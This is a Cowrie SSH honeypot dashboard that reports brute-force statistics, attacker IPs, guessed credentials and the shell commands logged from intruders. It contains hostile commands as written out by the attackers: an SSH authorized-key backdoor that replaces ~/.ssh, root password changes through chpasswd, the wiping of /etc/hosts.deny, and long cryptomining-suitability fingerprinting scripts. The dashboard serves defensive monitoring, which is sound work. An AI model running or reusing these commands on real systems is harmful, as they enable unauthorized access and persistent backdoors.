๐Ÿฏ HONEYPOT DASHBOARD

COWRIE SSH HONEYPOT // LIVE ATTACKER INTELLIGENCE // Generated: 2026-07-05 18:18:55 EDT
5610
Sessions Today
5093
Login Attempts Today
329
Successful Logins Today
265
Unique IPs Today
598
Commands Today

๐ŸŒ Attack Origins

๐Ÿ† Top Attackers

AttackerOriginISPAttempts
manic_chai_sol
103.64.129.98
๐Ÿ‡ฎ๐Ÿ‡ณ Bengaluru Teleindia Networks Private Limited 29876
rogue_dutch_root
45.153.34.235
๐Ÿ‡ณ๐Ÿ‡ฑ Eygelshoven Pfcloud UG (haftungsbeschrankt) 16215
spectral_dutch_sol
45.148.10.183
๐Ÿ‡ณ๐Ÿ‡ฑ Amsterdam Techoff SRV Limited 10441
weary_gouda_sol
2.57.122.177
๐Ÿ‡ณ๐Ÿ‡ฑ Amsterdam Unmanaged LTD 6372
haywire_tulip_sol
45.148.10.240
๐Ÿ‡ณ๐Ÿ‡ฑ Amsterdam Techoff SRV Limited 6240
haywire_tulip_root
160.119.71.11
๐Ÿ‡ณ๐Ÿ‡ฑ Amsterdam HostUS 5685
crimson_pho
123.27.168.40
๐Ÿ‡ป๐Ÿ‡ณ Haiphong VietNam Post and Telecom Corporation 5647
rusty_echo_sol
195.178.110.30
๐Ÿ‡ฆ๐Ÿ‡ฉ Andorra la Vella Techoff SRV Limited 4957
brisk_gouda_root
176.65.132.129
๐Ÿ‡ณ๐Ÿ‡ฑ Eygelshoven Pfcloud UG (haftungsbeschrankt) 2967
aloof_liberty_sol
92.118.39.63
๐Ÿ‡บ๐Ÿ‡ธ Dallas Unmanaged LTD 2592

๐Ÿ“ก Recent Activity

2026-07-05 18:18:30 glitchy_shadow_root 190.119.63.81 Login attempt: worker/worker123
2026-07-05 18:18:20 spectral_dutch_sol 45.148.10.183 Login attempt: ethereum/ethereum
2026-07-05 18:17:50 listless_panda_root_30 114.220.238.30 Login attempt: demo/demo@1
2026-07-05 18:17:47 wired_dutch_root_68 5.253.59.68 Login attempt: ubuntu/letmein
2026-07-05 18:17:45 baroque_rickshaw_root 103.170.173.26 Login attempt: root/nacho123
2026-07-05 18:17:27 restless_anatolia_root 94.154.43.181 Login attempt: chatgpt/chatgpt!123
2026-07-05 18:17:22 rogue_rogue_root 195.178.110.232 Login attempt: root/321
2026-07-05 18:17:13 glitchy_shadow_root 190.119.63.81 Login attempt: root/123321
2026-07-05 18:16:49 silent_ciao_root 151.60.148.200 Login attempt: root/fisherman
2026-07-05 18:16:30 glitchy_shadow_root 190.119.63.81 Login attempt: esuser/esuser123
2026-07-05 18:16:27 wired_dutch_root_68 5.253.59.68 Login attempt: root/abcdefg123456
2026-07-05 18:15:34 rogue_rogue_root 195.178.110.232 Login attempt: root/1qaz2wsx
2026-07-05 18:15:29 listless_panda_root_30 114.220.238.30 Login attempt: root/ABcd&1234
2026-07-05 18:15:16 glitchy_shadow_root 190.119.63.81 Login attempt: ftpuser/ftpuser
2026-07-05 18:15:12 spectral_dutch_sol 45.148.10.183 Command: /bin/./uname -s -v -n -r -m
2026-07-05 18:15:11 spectral_dutch_sol โ†‘ โœ… LOGIN SUCCESS: bitcoin/bitcoin
2026-07-05 18:15:09 wired_dutch_root_68 5.253.59.68 Login attempt: root/driver
2026-07-05 18:14:55 silent_ciao_root 151.60.148.200 Login attempt: root/4rfv*IK<
2026-07-05 18:14:40 restless_anatolia_root 94.154.43.181 Login attempt: chatgpt/chatgpt@123
2026-07-05 18:14:22 murky_boba_sol 61.223.116.74 Login attempt: root/1234@Qwer

๐ŸŽฌ Greatest Hits

๐Ÿ‡ณ๐Ÿ‡ฑ rogue_dutch_root
16215 attempts ยท 74 sessions ยท 74 cmds
Executed a bare-metal census with uname flags before cycling through every default password from git to nvidia in a desperate, low-effort login spree.
โฐ 05-17 02:34 โ€“ 06-15 11:46
๐Ÿ‡ณ๐Ÿ‡ฑ spectral_dutch_sol
10441 attempts ยท 1312 sessions ยท 1312 cmds
Chained Solana and crypto passwords with sequential guesses, then immediately ran a full uname inventory before dropping to a shell.
โฐ 05-07 00:44 โ€“ 07-05 18:18
๐Ÿ‡ณ๐Ÿ‡ฑ weary_gouda_sol
6372 attempts ยท 2415 sessions ยท 2415 cmds
Tried crypto wallet passwords and sequential strings before dumping system info โ€” a Solana enthusiast who forgot to patch their root account.
โฐ 05-06 20:32 โ€“ 06-23 06:43
๐Ÿ‡ณ๐Ÿ‡ฑ haywire_tulip_sol
6240 attempts ยท 720 sessions ยท 720 cmds
Sweated through 2970 attempts to crack Solana wallets with crypto-themed passwords before settling on sequential defaults and running a full system census.
โฐ 06-13 06:17 โ€“ 07-05 03:04
๐Ÿ‡ณ๐Ÿ‡ฑ haywire_tulip_root
5685 attempts ยท 110 sessions ยท 110 cmds
Cracked four weak passwords like P@ssw0rd and 111111, then immediately ran a uname census of the kernel, system, node, revision, and architecture.
โฐ 06-27 10:50 โ€“ 06-30 06:22
๐Ÿ‡ฆ๐Ÿ‡ฉ rusty_echo_sol
4957 attempts ยท 1328 sessions ยท 1328 cmds
Cracked Solana wallets and chained sequential passwords while inventorying the kernel, proving crypto credentials are just another password list to brute force.
โฐ 05-06 20:24 โ€“ 06-30 14:57

๐Ÿ”‘ Top Credentials

๐Ÿ“ˆ Attack Timeline

๐Ÿ“Š Daily Breakdown

DateSessionsLogin AttemptsSuccessfulUnique IPsCommandsTop Attacker
2026-07-05 5610 5093 329 265 598 ironclad_jade_root (8.138.128.98)
2026-07-04 5017 5184 253 356 514 manic_tulip_sol (45.153.34.15)
2026-07-03 8318 8457 397 411 943 obsidian_void_sol (91.92.40.29)
2026-07-02 7117 6914 313 416 561 sullen_windmill_root (45.156.87.166)
2026-07-01 6842 6902 308 409 654 sullen_clog_root (45.153.34.167)
2026-06-30 11129 10563 407 441 714 arctic_eagle_sol (141.11.88.22)
2026-06-29 8282 6131 202 326 400 haywire_tulip_root (160.119.71.11)
2026-06-28 11601 9270 424 210 831 haywire_tulip_root (160.119.71.11)
2026-06-27 7408 6413 295 268 392 haywire_tulip_root (160.119.71.11)
2026-06-26 7035 6491 347 221 487 midnight_rogue_root (91.92.40.28)
2026-06-25 3882 3546 208 212 319 stoic_stroopwafel_root_6 (178.208.88.6)
2026-06-24 5642 5913 248 239 265 ashen_bike_root (45.156.87.204)
2026-06-23 5160 5552 791 229 456 rogue_stroopwafel_sol (176.65.139.248)
2026-06-22 10631 11108 2313 270 548 weary_stroopwafel_root (176.65.139.181)
2026-06-21 7825 7661 3375 238 379 cryptic_tulip_root (176.65.139.247)
2026-06-20 8010 7919 2854 168 490 placid_dutch_root (91.92.42.227)
2026-06-19 12743 12798 5655 287 560 crimson_pho (123.27.168.40)
2026-06-18 9323 9395 4523 217 452 crimson_pho (123.27.168.40)
2026-06-17 9677 9728 4402 246 531 crimson_pho (123.27.168.40)
2026-06-16 36542 36596 557 274 625 manic_chai_sol (103.64.129.98)
2026-06-15 6414 6436 431 246 472 arctic_tulip_root (192.109.200.78)
2026-06-14 4144 4066 308 252 313 weary_rogue_root (91.92.40.25)
2026-06-13 7423 7533 467 304 593 wired_harbor_root (43.252.230.112)
2026-06-12 1781 1939 192 153 194 spectral_dutch_sol (45.148.10.183)
2026-06-11 31 0 0 8 0 โ€”
2026-06-10 25 0 0 13 0 โ€”
2026-06-09 21 0 0 10 0 โ€”
2026-06-08 17 0 0 6 0 โ€”
2026-06-07 19 0 0 8 0 โ€”
2026-06-06 594 319 1 27 1 ashen_gouda_root (45.144.212.75)
2026-06-05 1096 591 0 21 0 ashen_gouda_root (45.144.212.75)
2026-06-04 844 679 9 30 9 ashen_gouda_root (45.144.212.75)
2026-06-03 943 908 4 37 4 crimson_dutch_root (77.83.39.217)
2026-06-02 443 420 3 38 3 crimson_dutch_root (77.83.39.217)
2026-06-01 21 0 0 9 0 โ€”
2026-05-31 23 0 0 12 0 โ€”
2026-05-30 29 0 0 14 0 โ€”
2026-05-29 20 3 0 8 0 glitchy_dragon_root (115.190.201.230)
2026-05-28 26 0 0 11 0 โ€”
2026-05-27 21 0 0 11 0 โ€”
2026-05-26 20 0 0 10 0 โ€”
2026-05-25 30 0 0 11 0 โ€”
2026-05-22 156 136 32 27 26 aloof_liberty_sol (92.118.39.63)
2026-05-21 3517 3463 348 307 532 manic_windmill_sol (45.156.87.69)
2026-05-20 3616 3727 322 375 473 cryptic_gaucho_root (157.92.145.135)
2026-05-19 5158 5504 515 404 577 spectral_dutch_sol (45.148.10.183)
2026-05-18 3826 4599 352 400 367 arctic_tulip_root (192.109.200.78)
2026-05-17 20089 19885 432 330 451 rogue_dutch_root (45.153.34.235)
2026-05-16 5798 6264 513 369 527 brisk_gouda_root (176.65.132.129)
2026-05-15 6677 7396 511 322 519 obsidian_bike_sol (192.109.200.50)
2026-05-14 5927 6784 529 428 502 spectral_dutch_sol (45.148.10.183)
2026-05-13 4523 4384 357 420 410 spectral_dutch_sol (45.148.10.183)
2026-05-12 4215 3884 384 511 375 arctic_tulip_root (192.109.200.78)
2026-05-11 3268 3199 339 412 367 spectral_dutch_sol (45.148.10.183)
2026-05-10 3711 4532 355 430 427 weary_gouda_sol (2.57.122.177)
2026-05-09 4335 5092 442 348 493 spectral_dutch_sol (45.148.10.183)
2026-05-08 4732 4930 486 416 522 glitchy_gouda_root (45.156.87.99)
2026-05-07 5724 5510 478 220 537 baroque_dutch_root (176.65.132.242)
2026-05-06 1848 1735 218 60 226 glitchy_gouda_root (45.156.87.99)

๐Ÿ“Š All-Time Stats

MetricTotalAvg / DayLast 24hPeak Day
Sessions298,8994900.07,34536,542 (Jun 16)
Login Attempts295,5524845.16,89836,596 (Jun 16)
Successful Logins36,229593.94315,655 (Jun 19)
Unique IPs5,60191.8332511 (May 12)
Commands Executed19,639322.0770943 (Jul 3)
Success Rate12.3%12.3%6.2%48.1% (Jun 18)
Days Active61

๐Ÿ’€ Successful Logins โ€” What They Did

๐ŸŽญ spectral_dutch_sol (45.148.10.183) โ€” Amsterdam, Netherlands ยท 1312 sessions ยท 1312 cmds
2026-05-07 00:44 EDT ยท as bitcoin/bitcoin, eth/eth, firedancer/firedancer
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—1312
โ†ณ obfuscated system check
๐ŸŽญ glitchy_shadow_root (190.119.63.81) โ€” Lima, Peru ยท 21 sessions ยท 21 cmds
2026-07-05 15:59 EDT ยท as admin/admin, admin/admin123, docker/docker123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—21
๐ŸŽญ rogue_rogue_root (195.178.110.232) โ€” Andorra la Vella, Andorra ยท 31 sessions ยท 249 cmds
2026-06-26 08:19 EDT ยท as admin/123456, admin/admin123, admin/password
PATH normalization โ†’ OS fingerprinting via uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS release check via /etc/os-release โ†’ uptime sampling โ†’ hardware profiling for cryptomining suitability
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | ( head -c 250 2>/dev/null || busybox head -c 250 2>/dev/null || dd bs=250 count=1 2>/dev/null ) | ( tr -d '\n' 2>/dev/null || busybox tr -d '\n' 2>/dev/null || cat ); printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | ( head -c 250 2>/dev/null || busybox head -c 250 2>/dev/null || dd bs=250 count=1 2>/dev/null ) | ( tr -d '\n' 2>/dev/null || busybox tr -d '\n' 2>/dev/null || cat ); printf '\n'; printf 'execute_err='; out=$(bash -c 'printf "#!/bin/bash\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); case "$out" in *xxxxxx*) ;; *) out=$(/bin/bash -c 'printf "#!/bin/bash\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); case "$out" in *xxxxxx*) ;; *) out=$(/usr/bin/bash -c 'printf "#!/bin/bash\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); case "$out" in *xxxxxx*) ;; *) out=$(busybox sh -c 'printf "#!/bin/sh\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1 || sh -c 'printf "#!/bin/sh\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); esac; esac; esac; printf '%s' "$out" | ( head -c 250 2>/dev/null || busybox head -c 250 2>/dev/null || dd bs=250 count=1 2>/dev/null ) | ( tr -d '\n' 2>/dev/null || busybox tr -d '\n' 2>/dev/null || cat ); printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—4
โ†ณ make executable
$ uname -s -v -n -m 2 > /dev/null ร—31
$ /bin/uname -s -v -n -m 2 > /dev/null ร—25
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—25
$ busybox uname -s -v -n -m 2 > /dev/null ร—25
$ ( [ -f /proc/version ] ร—25
$ [ -f /proc/version ] ร—25
$ head -1 /proc/version | cut -d -f1 ร—25
$ [ -f /etc/os-release ] ร—25
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; echo; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; echo; cat /proc/device-tree/model 2>/dev/null; echo; lscpu 2>/dev/null | grep "Model name" | cut -d: -f2-; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—9
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—9
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output" ร—3
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—6
$ uname -m 2 > /dev/null ร—6
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—6
๐ŸŽญ silent_panda_root (8.138.108.179) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-07-05 17:05 EDT ยท as user/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m
๐ŸŽญ weary_wraith_root (20.173.116.24) โ€” Doha, Qatar ยท 1 session ยท 2 cmds
2026-07-05 16:34 EDT ยท as oracle/root123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ placid_bibimbap_root (119.28.161.148) โ€” Seoul, South Korea ยท 2 sessions ยท 21 cmds
2026-07-05 16:13 EDT ยท as oracle/oracle123!@#, root/1234
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:5IU4sDBngRjI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ midnight_dragon_root (122.13.25.186) โ€” Guangzhou, China ยท 4 sessions ยท 25 cmds
2026-06-25 19:19 EDT ยท as oracle/1qa2ws3ed, oracle/Oracle@2025, oracle/oracle123!@#
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—4
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—4
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:0BzvICPM4BXw"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ vapor_k-pop_root_170 (59.26.132.170) โ€” Yuseong-gu, South Korea ยท 1 session ยท 20 cmds
2026-07-05 16:04 EDT ยท as admin/admin123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
